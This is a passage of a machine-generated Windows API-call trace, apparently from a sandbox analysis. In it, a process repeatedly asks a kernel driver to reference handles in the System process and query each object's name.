DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f86350, HandleInformation=0x0) returned 0x0 [0200.511] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.512] PsReleaseProcessExitSynchronization () returned 0x2 [0200.512] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.512] ObQueryNameString (in: Object=0xfffffa8001f86350, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.512] ObfDereferenceObject (Object=0xfffffa8001f86350) returned 0x2 [0200.512] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.512] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.512] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.512] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.512] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.512] PsAcquireProcessExitSynchronization () returned 0x0 [0200.512] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.512] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f84660, HandleInformation=0x0) returned 0x0 [0200.512] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.512] PsReleaseProcessExitSynchronization () returned 0x2 [0200.512] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.512] ObQueryNameString (in: Object=0xfffffa8001f84660, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.512] ObfDereferenceObject (Object=0xfffffa8001f84660) returned 0x2 [0200.513] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.513] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.513] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.513] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.513] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.513] PsAcquireProcessExitSynchronization () returned 0x0 [0200.513] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.513] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f87680, HandleInformation=0x0) returned 0x0 [0200.513] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.513] PsReleaseProcessExitSynchronization () returned 0x2 [0200.513] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.513] ObQueryNameString (in: Object=0xfffffa8001f87680, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.513] ObfDereferenceObject (Object=0xfffffa8001f87680) returned 0x2 [0200.513] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.513] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.514] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.514] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.514] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.514] PsAcquireProcessExitSynchronization () returned 0x0 [0200.514] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.514] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f85050, HandleInformation=0x0) returned 0x0 [0200.514] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.514] PsReleaseProcessExitSynchronization () returned 0x2 [0200.514] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.514] ObQueryNameString (in: Object=0xfffffa8001f85050, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.514] ObfDereferenceObject (Object=0xfffffa8001f85050) returned 0x2 [0200.514] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.514] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.514] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.514] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.514] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.514] PsAcquireProcessExitSynchronization () returned 0x0 [0200.515] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.515] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f86af0, HandleInformation=0x0) returned 0x0 [0200.515] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.515] PsReleaseProcessExitSynchronization () returned 0x2 [0200.515] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.515] ObQueryNameString (in: Object=0xfffffa8001f86af0, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.515] ObfDereferenceObject (Object=0xfffffa8001f86af0) returned 0x2 [0200.515] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.515] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.515] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.515] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.515] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.515] PsAcquireProcessExitSynchronization () returned 0x0 [0200.515] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.515] ObReferenceObjectByHandle (in: Handle=0xffffffff800006fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f96ab0, HandleInformation=0x0) returned 0x0 [0200.515] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.515] PsReleaseProcessExitSynchronization () returned 0x2 [0200.515] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.516] ObQueryNameString (in: Object=0xfffffa8001f96ab0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.516] ObfDereferenceObject (Object=0xfffffa8001f96ab0) returned 0x2 [0200.516] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.516] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.516] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.516] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0200.516] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.516] PsAcquireProcessExitSynchronization () returned 0x0 [0200.516] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.516] ObReferenceObjectByHandle (in: Handle=0xffffffff80000700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f95f20, HandleInformation=0x0) returned 0x0 [0200.516] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.516] PsReleaseProcessExitSynchronization () returned 0x2 [0200.516] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.516] ObQueryNameString (in: Object=0xfffffa8001f95f20, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.516] ObfDereferenceObject (Object=0xfffffa8001f95f20) returned 0x2 [0200.516] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.517] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.517] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.517] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.517] PsAcquireProcessExitSynchronization () returned 0x0 [0200.517] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.517] ObReferenceObjectByHandle (in: Handle=0xffffffff80000704, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034ebb90, HandleInformation=0x0) returned 0x0 [0200.517] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.517] PsReleaseProcessExitSynchronization () returned 0x2 [0200.517] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.517] ObQueryNameString (in: Object=0xfffffa80034ebb90, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.517] ObfDereferenceObject (Object=0xfffffa80034ebb90) returned 0x2 [0200.517] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.517] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.517] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.517] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.517] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.517] PsAcquireProcessExitSynchronization () returned 0x0 [0200.517] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.518] ObReferenceObjectByHandle (in: Handle=0xffffffff80000708, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed4050, HandleInformation=0x0) returned 0x0 [0200.518] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.518] PsReleaseProcessExitSynchronization () returned 0x2 [0200.518] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.518] ObQueryNameString (in: Object=0xfffffa8001ed4050, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.518] ObfDereferenceObject (Object=0xfffffa8001ed4050) returned 0x2 [0200.518] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.518] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.518] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.518] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.518] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.518] PsAcquireProcessExitSynchronization () returned 0x0 [0200.518] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.518] ObReferenceObjectByHandle (in: Handle=0xffffffff8000070c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038d52c0, HandleInformation=0x0) returned 0x0 [0200.518] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.518] PsReleaseProcessExitSynchronization () returned 0x2 [0200.518] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.518] ObQueryNameString (in: Object=0xfffffa80038d52c0, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.518] ObfDereferenceObject (Object=0xfffffa80038d52c0) returned 0x2 [0200.519] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.519] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.519] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.519] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.519] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.519] PsAcquireProcessExitSynchronization () returned 0x0 [0200.519] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0200.519] ObReferenceObjectByHandle (in: Handle=0xffffffff80000710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed37c0, HandleInformation=0x0) returned 0x0 [0200.519] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0200.519] PsReleaseProcessExitSynchronization () returned 0x2 [0200.519] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0200.519] ObQueryNameString (in: Object=0xfffffa8001ed37c0, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0200.519] ObfDereferenceObject (Object=0xfffffa8001ed37c0) returned 0x2 [0200.520] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0200.520] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0200.520] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0200.520] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0200.520] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0200.520] PsAcquireProcessExitSynchronization () returned 0x0 [0201.029] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.029] ObReferenceObjectByHandle (in: Handle=0xffffffff80000714, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800398ca70, HandleInformation=0x0) returned 0x0 [0201.029] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.029] PsReleaseProcessExitSynchronization () returned 0x2 [0201.029] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.029] ObQueryNameString (in: Object=0xfffffa800398ca70, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.029] ObfDereferenceObject (Object=0xfffffa800398ca70) returned 0x2 [0201.029] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.030] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.030] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.030] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.030] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.030] PsAcquireProcessExitSynchronization () returned 0x0 [0201.030] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.030] ObReferenceObjectByHandle (in: Handle=0xffffffff80000718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed3e50, HandleInformation=0x0) returned 0x0 [0201.030] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.030] PsReleaseProcessExitSynchronization () returned 0x2 [0201.030] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.030] ObQueryNameString (in: Object=0xfffffa8001ed3e50, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.030] ObfDereferenceObject (Object=0xfffffa8001ed3e50) returned 0x2 [0201.030] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.030] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.030] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.030] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.030] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.030] PsAcquireProcessExitSynchronization () returned 0x0 [0201.030] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.030] ObReferenceObjectByHandle (in: Handle=0xffffffff8000071c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039d2c90, HandleInformation=0x0) returned 0x0 [0201.030] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.030] PsReleaseProcessExitSynchronization () returned 0x2 [0201.030] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.030] ObQueryNameString (in: Object=0xfffffa80039d2c90, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.031] ObfDereferenceObject (Object=0xfffffa80039d2c90) returned 0x2 [0201.031] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.031] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.031] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.031] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.031] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.031] PsAcquireProcessExitSynchronization () returned 0x0 [0201.031] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.031] ObReferenceObjectByHandle (in: Handle=0xffffffff80000720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed2690, HandleInformation=0x0) returned 0x0 [0201.031] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.031] PsReleaseProcessExitSynchronization () returned 0x2 [0201.031] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.031] ObQueryNameString (in: Object=0xfffffa8001ed2690, ObjectNameInfo=0xfffffa8003201044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003201044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.031] ObfDereferenceObject (Object=0xfffffa8001ed2690) returned 0x2 [0201.031] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.031] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.031] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.031] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.031] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.031] PsAcquireProcessExitSynchronization () returned 0x0 [0201.031] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.031] ObReferenceObjectByHandle (in: Handle=0xffffffff80000724, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ea4930, HandleInformation=0x0) returned 0x0 [0201.031] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.032] PsReleaseProcessExitSynchronization () returned 0x2 [0201.032] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.032] ObQueryNameString (in: Object=0xfffffa8001ea4930, ObjectNameInfo=0xfffffa8003198044, 